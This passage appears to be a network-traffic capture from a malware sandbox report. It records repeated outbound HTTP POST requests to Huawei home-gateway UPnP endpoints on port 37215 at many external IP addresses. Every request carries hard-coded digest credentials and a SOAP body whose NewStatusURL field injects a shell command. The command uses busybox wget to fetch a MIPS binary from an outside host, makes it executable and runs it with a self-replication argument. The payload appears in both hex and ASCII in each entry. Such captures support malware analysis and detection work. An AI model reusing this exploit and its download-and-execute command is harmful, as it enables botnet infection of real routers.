                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          541192.168.2.235723259.23.33.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196214914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          542192.168.2.2334948197.15.3.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196252108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          543192.168.2.2335468157.175.192.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196270943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          544192.168.2.2348926115.7.111.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196289062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          545192.168.2.2352730157.13.32.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196304083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          546192.168.2.233526441.228.234.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196325064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          547192.168.2.235015441.201.245.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196409941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          548192.168.2.233522641.29.102.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196429014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          549192.168.2.2338768197.105.28.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196569920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          550192.168.2.235346841.58.180.11837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196594954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          551192.168.2.2339856197.50.106.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196605921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
